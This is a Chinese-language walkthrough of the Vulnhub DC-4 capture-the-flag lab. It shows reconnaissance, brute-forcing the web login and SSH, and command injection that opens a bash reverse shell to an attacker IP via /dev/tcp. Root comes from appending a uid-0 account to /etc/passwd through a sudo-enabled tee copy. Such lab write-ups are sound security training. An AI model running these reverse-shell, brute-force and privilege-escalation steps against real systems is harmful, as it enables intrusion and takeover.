Vulnhub DC_4

前言

vulnhub dc 4

https://www.vulnhub.com/entry/dc-4,313/

靶机IP

192.168.1.11

信息收集

nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt

nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt 

• 操作系统：Linux 3.2 - 4.14（Debian）
• 端口：22(OpenSSH 7.4p1)，80(nginx 1.15.10)

gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50

[08:11:16] 301 -  170B  - /css  ->  http://192.168.1.11/css/               
[08:11:23] 301 -  170B  - /images  ->  http://192.168.1.11/images/ 

没有有用信息

暴力

80端口为登录框，源码无信息，尝试sql注入，失败

似乎只剩暴力这条路

burp抓包发现是明文，但并没有账号或密码错误的回显

尝试爆破
成功

得到凭据

admin:happy

RCE

命令执行面板

抓包得到参数为执行的命令

radio=ls+-l&submit=Run

反弹shell

curl -X POST http://192.168.1.11/command.php \
  -H "Cookie: PHPSESSID=u8qlergatfe52bkor6q6iatcv1" \
  -d "radio=bash -c 'bash -i >%26 /dev/tcp/192.168.1.17/6666 0>%261'&submit=Run"

横向

find / -perm -4000 2>/dev/null

suid发现/home/jim/test.sh可疑文件并且权限为777

-rwsrwxrwx 1 jim jim 174 Apr  6  2019 /home/jim/test.sh    

# 1. 覆盖 test.sh
echo '#!/bin/bash' > /home/jim/test.sh
echo '/bin/bash' >> /home/jim/test.sh

# 2. 执行
/home/jim/test.sh

失败，还是www权限，但在jim家目录发现old-passwords.bak备份密码本

保存下来爆破ssh

hydra -l jim -P pass.txt ssh://192.168.1.11

得到凭据

jim:jibril04

jim家目录下的mbox有查看权限

From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

一封邮件，得到信息：

• 邮件服务器：Exim 4.89
• 发件人：root@dc-4
• 收件人：jim@dc-4
• 时间：2019年4月6日
• 内容：仅测试消息

寻找邮件保存位置

在/var/spool/mail 找到jim邮件

From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

得到凭据

charles:^xHhA&hvim0y

teehee提权

登录charles用户

发现 /usr/bin/teehe 有sudo权限

gtfbins未搜到，查看该程序帮助

charles@dc-4:~$ /usr/bin/teehee  --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

可以追加文件，尝试追加/etc/passwd

创建hack用户

openssl passwd -1 -salt hack password
echo 'hack:$1$hack$Qfvz92fBAtSC9ccCE6BES0:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

成功，并得到flag

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.